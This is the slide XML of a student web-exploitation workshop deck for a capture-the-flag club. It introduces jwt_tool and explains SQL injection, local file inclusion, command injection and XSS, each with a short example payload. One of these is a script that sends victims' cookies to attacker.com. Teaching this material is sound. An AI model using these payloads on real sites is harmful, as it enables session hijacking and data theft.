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Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId16"/>
      <p:bold r:id="rId17"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId18"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato Bold" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId19"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato Italics" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId20"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Paytone One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70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svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://surfshark.com/research/study/data-breach-recap-202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39619" y="-1051404"/>
            <a:ext cx="8439362" cy="6030308"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8439362" h="6030308">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8439362" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8439362" y="6030308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6030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 rot="-10800000" flipH="1">
            <a:off x="-3303437" y="7652673"/>
            <a:ext cx="8439362" cy="6030308"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8439362" h="6030308">
                <a:moveTo>
                  <a:pt x="8439361" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6030307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8439361" y="6030307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84393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13152076" y="7652673"/>
            <a:ext cx="8170623" cy="8096345"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8170623" h="8096345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>
            <a:off x="-3034699" y="-5461944"/>
            <a:ext cx="8170623" cy="8096345"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8170623" h="8096345">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8170623" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8170623" y="8096344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="809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TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2359273" y="3557340"/>
            <a:ext cx="13569454" cy="3190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35"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10618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WEB EXPLOITATION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="12635"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10618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WORKSHOP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38845" y="2884240"/>
            <a:ext cx="9610311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24"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3499">
                <a:solidFill>
                  <a:srgbClr val="FFD7F3"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>FLAG HUNTERS MMU 2025</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Freeform 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-10403804" y="3631744"/>
            <a:ext cx="13621281" cy="1609788"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="13621281" h="1609788">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13621281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13621281" y="1609787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1609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9" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9077934" y="9031472"/>
            <a:ext cx="4747840" cy="1990241"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4747840" h="1990241">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4747840" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4747840" y="1990241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19902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254698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0" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7425581" y="9031472"/>
            <a:ext cx="4747840" cy="1990241"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4747840" h="1990241">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4747840" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4747840" y="1990241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19902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254698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1" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="193726" y="-5651784"/>
            <a:ext cx="13621281" cy="1609788"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="13621281" h="1609788">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13621281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13621281" y="1609788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16097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2" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2183966" y="-4981134"/>
            <a:ext cx="13621281" cy="1609788"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="13621281" h="1609788">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13621281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13621281" y="1609788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16097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774" y="1788193"/>
            <a:ext cx="14352452" cy="8145017"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14352452" h="8145017">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14352452" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14352452" y="8145016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8145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6263506" y="365950"/>
            <a:ext cx="5760988" cy="132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53"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8700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JWT_TOOL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3656" y="788784"/>
            <a:ext cx="14399344" cy="1325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353"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8700" u="none" strike="noStrike" dirty="0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STEP-BY-STEP INSTALLING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808341"/>
            <a:ext cx="1943100" cy="461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In Terminal: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582249"/>
            <a:ext cx="8752457" cy="37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$ git clone https://github.com/ticarpi/jwt_tool.git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848746"/>
            <a:ext cx="6272680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3"/>
              </a:lnSpc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Open Browser &gt; Search jwt_tool github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481513"/>
            <a:ext cx="8752457" cy="37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$ cd jwt_tool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421043"/>
            <a:ext cx="8752457" cy="37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$ pip3 install -r requirements.txt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389148"/>
            <a:ext cx="3127772" cy="49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To run the jwt_tool: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164610"/>
            <a:ext cx="8752457" cy="37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$ python3 jwt_tool.py &lt;INSERT-JWT&gt; [OPTIONS]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="7871407" y="9395703"/>
            <a:ext cx="17533663" cy="2072160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17533663" h="2072160">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17533663" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17533663" y="2072160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="207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572000" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6096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47000"/>
            </a:blip>
            <a:srcRect l="47620" t="31437" r="33322" b="4246"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="6096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-3318947" y="6185937"/>
            <a:ext cx="6637894" cy="7229390"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6637894" h="7229390">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6637894" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6637894" y="7229390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="72293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>
            <a:off x="15429816" y="-2978160"/>
            <a:ext cx="6637894" cy="7229390"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6637894" h="7229390">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6637894" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6637894" y="7229390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="72293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TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5807541" y="920462"/>
            <a:ext cx="9622275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4"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7499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INJECTION ATTACKS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29169" y="4159368"/>
            <a:ext cx="674908" cy="961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09"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6394">
                <a:solidFill>
                  <a:srgbClr val="ED7843"/>
                </a:solidFill>
                <a:latin typeface="Paytone One"/>
                <a:ea typeface="Paytone One"/>
                <a:cs typeface="Paytone One"/>
                <a:sym typeface="Paytone One"/>
              </a:rPr>
              <a:t>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29169" y="6125002"/>
            <a:ext cx="674908" cy="961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09"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6394">
                <a:solidFill>
                  <a:srgbClr val="ED7843"/>
                </a:solidFill>
                <a:latin typeface="Paytone One"/>
                <a:ea typeface="Paytone One"/>
                <a:cs typeface="Paytone One"/>
                <a:sym typeface="Paytone One"/>
              </a:rPr>
              <a:t>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29169" y="7784987"/>
            <a:ext cx="674908" cy="961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09"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6394">
                <a:solidFill>
                  <a:srgbClr val="ED7843"/>
                </a:solidFill>
                <a:latin typeface="Paytone One"/>
                <a:ea typeface="Paytone One"/>
                <a:cs typeface="Paytone One"/>
                <a:sym typeface="Paytone One"/>
              </a:rPr>
              <a:t>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07541" y="2334475"/>
            <a:ext cx="9622275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290"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="24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Occur when untrusted input is sent to an interpreter (SQL, OS, file handler) and executed as part of a command.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56899" y="4279983"/>
            <a:ext cx="4700708" cy="41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485"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="24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SQL Injection (SQLI)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56899" y="6210727"/>
            <a:ext cx="3277018" cy="41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485"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="24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Local File Inclusion (LFI)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56899" y="7877494"/>
            <a:ext cx="4055753" cy="41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485"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="24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Command Injection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56899" y="4765292"/>
            <a:ext cx="7706111" cy="107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898" lvl="1" indent="-219949" algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Manipulating queries to access or modify database data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="439898" lvl="1" indent="-219949" algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="203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‘ OR ‘1’=’1 --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56899" y="6644352"/>
            <a:ext cx="7277032" cy="107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898" lvl="1" indent="-219949" algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Attacker tricks the app into including local files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="439898" lvl="1" indent="-219949" algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="203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?page=../../etc/passwd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56899" y="8364586"/>
            <a:ext cx="9776233" cy="107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898" lvl="1" indent="-219949" algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Attacker injects OS commands through unsanitize input fields.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="439898" lvl="1" indent="-219949" algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="203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; ls -la (commands to reveals files on the target server)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91343" y="-1841028"/>
            <a:ext cx="4024787" cy="4781064"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4024787" h="4781064">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4024787" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4024787" y="4781064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4781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3411084" y="549504"/>
            <a:ext cx="7836408" cy="212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29"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6999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CLIENT-SIDE ATTACKS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895191"/>
            <a:ext cx="10218792" cy="1986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0"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="24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Target the user’s browser instead of the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="483077" lvl="1" indent="-241539" algn="l">
              <a:lnSpc>
                <a:spcPts val="3938"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/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Exploit how the browser interprets untrusted input (HTML/JS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="483077" lvl="1" indent="-241539" algn="l">
              <a:lnSpc>
                <a:spcPts val="3938"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/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Common impact: stolen cookies, hijacked sessions, phishing, malware delivery.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362259"/>
            <a:ext cx="4700708" cy="41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485"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2437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Cross-Site Scripting (XSS)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960436"/>
            <a:ext cx="10218792" cy="3607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898" lvl="1" indent="-219949" algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2037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injects malicious JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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into web pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="439898" lvl="1" indent="-219949" algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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 POC:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="203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   &lt;script&gt;alert(‘Hacked’)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2037" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lato Italics"/>
                <a:ea typeface="Lato Italics"/>
                <a:cs typeface="Lato Italics"/>
                <a:sym typeface="Lato Italics"/>
              </a:rPr>
              <a:t>(Runs in the victim’s browser, can steal cookies or hijack sessions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2037" i="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lato Italics"/>
              <a:ea typeface="Lato Italics"/>
              <a:cs typeface="Lato Italics"/>
              <a:sym typeface="Lato Italics"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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attacker can do next?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="439898" lvl="1" indent="-219949" algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2037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Steal session cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2037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&lt;script&gt;document.location='http://attacker.com/steal? c='+document.cookie&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2037" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lato Italics"/>
                <a:ea typeface="Lato Italics"/>
                <a:cs typeface="Lato Italics"/>
                <a:sym typeface="Lato Italics"/>
              </a:rPr>
              <a:t>(sends victim’s cookies to attacker)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779749" y="13098"/>
            <a:ext cx="9636282" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12848376" cy="137160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47000"/>
            </a:blip>
            <a:srcRect l="36226" t="30092" r="21928" b="2901"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="12848376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98444" y="0"/>
            <a:ext cx="4196889" cy="10287000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4196889" h="10287000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4196888" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41968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00544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2101634" y="0"/>
            <a:ext cx="14084732" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="18779642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47000"/>
            </a:blip>
            <a:srcRect t="23499" b="27748"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="18779642" cy="13716000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16183176" y="0"/>
            <a:ext cx="4196889" cy="10287000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4196889" h="10287000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4196889" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41968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0544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TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5260240" y="3103311"/>
            <a:ext cx="7767521" cy="3736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352"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="14352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35655" y="7104730"/>
            <a:ext cx="9610311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24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Hope you guys keep on learning more!!!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5423" y="0"/>
            <a:ext cx="10932577" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1457676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0000"/>
            </a:blip>
            <a:srcRect l="22855" r="6737"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="14576769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9144000" y="1685313"/>
            <a:ext cx="7691953" cy="7230436"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7691953" h="7230436">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7691953" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7691953" y="7230436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7230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>
            <a:off x="-886843" y="6858669"/>
            <a:ext cx="8242267" cy="8242267"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8242267" h="8242267">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8242266" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8242266" y="8242267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="82422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>
            <a:off x="-886843" y="-4499873"/>
            <a:ext cx="8242267" cy="8242267"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8242267" h="8242267">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8242266" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8242266" y="8242266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8242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TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="177805" y="4541706"/>
            <a:ext cx="6974926" cy="132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53"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8700" u="none" strike="noStrike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ABOUT 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45798" y="2312571"/>
            <a:ext cx="5234085" cy="2987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3077" lvl="1" indent="-241539" algn="just">
              <a:lnSpc>
                <a:spcPts val="3982"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="223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Final year student from MMU Melaka Campus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="483077" lvl="1" indent="-241539" algn="just">
              <a:lnSpc>
                <a:spcPts val="3982"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="223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Focuses on Web Exploitation, also interested in Cryptography.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="483077" lvl="1" indent="-241539" algn="just">
              <a:lnSpc>
                <a:spcPts val="3982"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="223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5th Placed UMCS CTF Final Round 2025.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90981" y="-181860"/>
            <a:ext cx="8439362" cy="6030308"/>
          </a:xfrm>
          <a:custGeom>
